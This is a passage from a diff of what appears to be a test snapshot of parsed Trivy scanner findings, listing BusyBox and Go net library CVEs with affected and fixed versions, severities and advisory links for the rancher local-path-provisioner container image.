"https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", + "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", + "https://security.gentoo.org/glsa/202105-09", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://ubuntu.com/security/notices/USN-5179-2", + "https://www.cve.org/CVERecord?id=CVE-2021-28831", + ], + }, + "category": "Vulnerability", + "description": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: invalid free or segmentation fault via malformed gzip data", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://avd.aquasec.com/nvd/cve-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://access.redhat.com/security/cve/CVE-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://security.gentoo.org/glsa/202105-09", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://ubuntu.com/security/notices/USN-5179-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-28831", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42378", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42378", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42378", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i()", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://avd.aquasec.com/nvd/cve-2021-42378", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://access.redhat.com/security/cve/CVE-2021-42378", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42378", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42379", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42379", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42379", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file()", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://avd.aquasec.com/nvd/cve-2021-42379", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-42379", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42379", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42380", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42380", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42380", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar()", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://avd.aquasec.com/nvd/cve-2021-42380", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-42380", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42380", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42381", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2021-42381", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42381", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468135", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://avd.aquasec.com/nvd/cve-2021-42381", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2021-42381", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42381", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-31525", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42382", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-31525", - "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", - "https://github.com/golang/go/issues/45710", - "https://go.dev/cl/313069", - "https://go.dev/issue/45710", - "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", - "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", - "https://linux.oracle.com/cve/CVE-2021-31525.html", - "https://linux.oracle.com/errata/ELSA-2021-3076.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", - "https://pkg.go.dev/vuln/GO-2022-0236", - "https://security.gentoo.org/glsa/202208-02", - "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "https://access.redhat.com/security/cve/CVE-2021-42382", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42382", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-31525", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-31525", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/issues/45710", - }, - { - "type": "URL", - "value": "https://go.dev/cl/313069", + "value": "https://avd.aquasec.com/nvd/cve-2021-42382", }, { "type": "URL", - "value": "https://go.dev/issue/45710", + "value": "https://access.redhat.com/security/cve/CVE-2021-42382", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0236", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42382", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42383", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://access.redhat.com/security/cve/CVE-2021-42383", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-42383", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://avd.aquasec.com/nvd/cve-2021-42383", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://access.redhat.com/security/cve/CVE-2021-42383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": 